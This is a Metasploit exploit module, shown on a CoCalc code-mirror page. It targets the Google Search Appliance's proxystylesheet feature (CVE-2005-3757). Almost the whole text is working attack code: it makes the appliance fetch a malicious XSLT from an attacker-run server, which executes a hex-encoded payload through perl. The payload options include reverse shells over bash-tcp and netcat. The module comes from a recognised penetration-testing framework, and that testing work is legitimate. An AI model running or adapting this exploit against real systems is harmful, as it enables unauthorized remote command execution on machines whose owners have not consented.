CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8
  include Msf::Exploit::Remote::HttpClient

9
  include Msf::Exploit::Remote::HttpServer

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Google Appliance ProxyStyleSheet Command Execution',

14
      'Description'    => %q{

15
        This module exploits a feature in the Saxon XSLT parser used by

16
      the Google Search Appliance. This feature allows for arbitrary

17
      java methods to be called. Google released a patch and advisory to

18
      their client base in August of 2005 (GA-2005-08-m). The target appliance

19
      must be able to connect back to your machine for this exploit to work.

20
      },

21
      'Author'         => [ 'hdm' ],

22
      'License'        => MSF_LICENSE,

23
      'References'     =>

24
        [

25
          ['CVE', '2005-3757'],

26
          ['OSVDB', '20981'],

27
          ['BID', '15509'],

28
        ],

29
      'Privileged'     => false,

30
      'Payload'        =>

31
        {

32
          'DisableNops' => true,

33
          'Space'       => 4000,

34
          'Compat'      =>

35
            {

36
              'PayloadType' => 'cmd cmd_bash',

37
              'RequiredCmd' => 'generic perl bash-tcp telnet netcat netcat-e',

38
            }

39
        },

40
      'Platform'       => 'unix',

41
      'Arch'           => ARCH_CMD,

42
      'Targets'        => [[ 'Automatic', { }]],

43
      'DisclosureDate' => '2005-08-16',

44
      'Stance'         => Msf::Exploit::Stance::Aggressive,

45
      'DefaultTarget' => 0))

46
  end

47


48
  # Handle incoming requests from the appliance

49
  def on_request_uri(cli, request)

50


51
    print_status("Handling new incoming HTTP request...")

52


53
    exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'

54
    data = @xml_data.gsub(/:x:MSF:x:/, exec_str)

55
    send_response(cli, data)

56
  end

57


58
  def autofilter

59
    true

60
  end

61


62
  def check

63
    res = send_request_cgi({

64
      'uri'      => '/search',

65
      'vars_get' =>

66
      {

67
        'client'          => rand_text_alpha(rand(15)+1),

68
        'site'            => rand_text_alpha(rand(15)+1),

69
        'output'          => 'xml_no_dtd',

70
        'q'               => rand_text_alpha(rand(15)+1),

71
        'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'

72
      }

73
    }, 10)

74


75
    if (res and res.body =~ /cannot be resolved to an ip address/)

76
      vprint_status("This system appears to be vulnerable")

77
      return Exploit::CheckCode::Appears

78
    end

79


80
    if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)

81
      vprint_status("This system appears to be patched")

82
    end

83


84
    return Exploit::CheckCode::Safe

85
  end

86


87


88
  def exploit

89


90
    # load the xml data

91
    path = File.join(Msf::Config.data_directory, "exploits", "google_proxystylesheet.xml")

92
    fd = File.open(path, "rb")

93
    @xml_data = fd.read(fd.stat.size)

94
    fd.close

95


96
    print_status("Obtaining the appliance site and client IDs...")

97
    # Send a HTTP/1.0 request to learn the site configuration

98
    res = send_request_raw({

99
      'uri'     => '/',

100
      'version' => '1.0'

101
    }, 10)

102


103
    if !(res and res['location'] and res['location'] =~ /site=/)

104
      print_status("Could not read the location header: #{res.code} #{res.message}")

105
      return

106
    end

107


108
    m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)

109
    if !(m and m[1] and m[2])

110
      print_status("Invalid location header: #{res['location']}")

111
      return

112
    end

113


114
    print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")

115
    start_service

116


117
    print_status("Requesting a search using our custom XSLT...")

118
    res = send_request_cgi({

119
      'uri'      => '/search',

120
      'vars_get' =>

121
      {

122
        'client'          => m[2],

123
        'site'            => m[1],

124
        'output'          => 'xml_no_dtd',

125
        'q'               => rand_text_alpha(rand(15)+1),

126
        'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",

127
        'proxyreload'     => '1'

128
      }

129
    }, 25)

130


131
    if (res)

132
      print_status("The server returned: #{res.code} #{res.message}")

133
      print_status("Waiting on the payload to execute...")

134
      select(nil,nil,nil,20)

135
    else

136
      print_status("No response from the server")

137
    end

138
  end

139
end

140


141